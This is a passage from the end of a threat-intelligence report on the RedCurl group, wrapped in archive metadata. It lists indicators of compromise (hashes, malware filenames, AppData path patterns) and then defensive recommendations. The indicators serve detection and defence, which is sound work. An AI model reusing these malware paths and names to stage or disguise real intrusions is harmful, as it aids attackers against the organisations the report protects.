26047d1dd5529cbb74ac684a8ea1656c\r\nSHA1: 57abca2f6fe00e6083cff74171d5efefb3eacebf\r\nSHA256: da4a1247a9442b685b145c12c5c2aa0469d4826557699308eb69044d24a2df9a\r\nPE Timestamp: Wednesday, 28.04.2021 10:29:42 UTC\r\nSize: 130048 bytes\r\nFilename: updorchtls_c30742b.exe\r\nMD5: f9051aa264fba5b5c030f795418c2652\r\nSHA1: f8c96760ee301baf2c24a4991e05eb3c2c155a49\r\nSHA256: 25f10228706b12a5b91240f2606f78827a67655750a0dae53b1a7cd47c1efb63\r\nPE Timestamp: Tuesday, 11.05.2021 10:28:30 UTC\r\nSize: 130048 bytes\r\nTemp\\UGTE%COMPUTERNAME%\\apra%USERNAME%\r\nFileHistory\\FileHistory_[a-f0-9]+\r\nMUI\\LPRemove_[a-f0-9]+\r\n%APPDATA%\\%COMPUTERNAME%.pdf\r\n%APPDATA%\\MTLK%COMPUTERNAME%\\paran%USERNAME%.dll\r\n%LOCALAPPDATA%\\MemoryDiagnosticServices\\[a-z0-9]+.dll\r\n%LOCALAPPDATA%\\MemoryDiagnosticServices\\[a-z0-9]+.exe\r\n%APPDATA%\\AppIDStorage\\convpolchk_b816871.dll\r\n%APPDATA%\\AppIDStorage\\[a-z0-9]+.exe\r\n%APPDATA%\\Microsoft\\Provision\\cellprovcntrl_0877cae.exe\r\n%APPDATA%\\Microsoft\\Provision\\[a-z0-9]+.exe\r\n %APPDATA%\\MUIControl\\[a-z0-9]+.dll\r\n %APPDATA%\\MUIControl\\[a-z0-9]+.exe\r\n%LOCALAPPDATA%\\SubFileHistory\\[a-z0-9]+.dll\r\n%LOCALAPPDATA%\\SubFileHistory\\[a-z0-9]+.exe\r\nRedCurl.CHABIN2:\r\nWindows Task Scheduler’s Name:\r\nFile paths:\n\n39\r\n© GROUP−IB\r\nR ecommendations\r\nREDCURL: THE AWAKENING\r\nRecommendations\r\n1. Use modern email protection measures to prevent initial com-promise. We recommend learning about how Group-IB Atmosphere\r\ncan counter these kinds of attacks effectively.\r\n2. Regularly train employees to make them less susceptible\r\nto phishing in all its forms.\r\n3. Limit access to resources that offer free web hosting or cloud\r\nstorage, excluding those used within the organization.\r\n4. Ensure that your security measures allow for proactive\r\nthreat hunting that help identify threats that cannot be detected\r\nautomatically.\r\n5. Keep an eye out for LNK files being created in unusual locations,\r\nincluding network drives.\r\n6. Monitor tasks created in the Scheduler, paying particular atten-tion to those that run executable files from %AppData% and its\r\nsubdirectories.\r\n7. Pay special attention to solutions for working with Active Direc-tory, including built-in tools, which could be used by attackers for\r\nreconnaissance.\r\n8. Monitor any use of commands and built-in tools that are often\r\nused for collecting information about the system and files.\r\n9. Look out for the use of Python scripts, especially on hosts where\r\nthey are not usually used.\r\n10. Use Group-IB Threat Intelligence \u0026 Attribution data to detect\r\nand proactively search for threats.\r\nEach analytical report issued by the Group-IB Threat Intelligence\r\nteam contains recommendations on how to prevent attacks con-ducted by the group(s) analyzed. In this case, Group-IB experts\r\nrecommend taking the following steps:\n\nwww.group-ib.com\r\ngroup-ib.com/blog/\r\ninfo@group-ib.com\r\n+7 495 984 33 64\r\ntwitter.com/groupib\r\nfacebook.com/group-ib\r\nPREVENTING\r\nAND INVESTIGATING\r\nCYBERCRIME\r\nSINCE 2003", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://go.group-ib.com/report-redcurl-awakening-en" ], "report_names": [ "report-redcurl-awakening-en" ], "threat_actors": [], "ts_created_at": 1778121802, "ts_updated_at": 1778121851, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/761ecbca0bbb436bdd87f9046aa80dc189c59fda.pdf", "text": "https://archive.orkl.eu/761ecbca0bbb436bdd87f9046aa80dc189c59fda.txt", "img": "https://archive.orkl.eu/761ecbca0bbb436bdd87f9046aa80dc189c59fda.jpg" } }